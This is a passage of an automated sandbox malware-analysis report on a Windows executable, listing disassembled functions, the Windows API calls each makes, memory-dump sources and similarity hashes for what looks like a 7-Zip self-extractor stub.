                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                            • String ID: IA
                                                                                            • API String ID: 3462485524-3293647318
                                                                                            • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                                            • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                                            • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                                            • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                                            Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: wsprintf$ExitProcesslstrcat
                                                                                            • String ID: 0x%p
                                                                                            • API String ID: 2530384128-1745605757
                                                                                            • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                            • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                                            • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                            • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                                            Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                                              • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$??3@
                                                                                            • String ID: 100%%
                                                                                            • API String ID: 2562992111-568723177
                                                                                            • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                            • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                                            • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                            • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                                            Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wsprintfW.USER32 ref: 00407A12
                                                                                              • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                              • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                            • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                                            • String ID: (%u%s)
                                                                                            • API String ID: 3595513934-2496177969
                                                                                            • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                            • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                                            • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                                            • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                                            Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetNativeSystemInfo$kernel32
                                                                                            • API String ID: 2574300362-3846845290
                                                                                            • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                            • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                                            • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                                            • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                                            Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                            • API String ID: 2574300362-3900151262
                                                                                            • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                            • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                                            • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                                            • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                                            Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                            • API String ID: 2574300362-736604160
                                                                                            • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                            • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                                            • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                                            • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                                            Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                                              • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1731127917-0
                                                                                            • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                            • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                                            • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                                            • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                                            Function 00403F85 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                                            • wsprintfW.USER32 ref: 00403FFB
                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: PathTemp$AttributesFilewsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1746483863-0
                                                                                            • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                            • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                                            • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                            • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                                            Function 00401A85 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharUpper
                                                                                            • String ID:
                                                                                            • API String ID: 9403516-0
                                                                                            • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                            • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                                            • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                            • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                                            Function 00407FA5 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                                            • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                                            • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                              • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                              • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                              • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                              • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                                            • String ID:
                                                                                            • API String ID: 2538916108-0
                                                                                            • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                            • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                                            • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                            • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                                            Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                                            • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                                            • DeleteObject.GDI32(00000000), ref: 00406878
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                            • String ID:
                                                                                            • API String ID: 1900162674-0
                                                                                            • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                            • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                                            • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                            • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                                            Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040749F
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                                            • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                                              • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                              • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1557639607-0
                                                                                            • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                            • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                                            • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                            • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                                            Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                                              • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                              • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
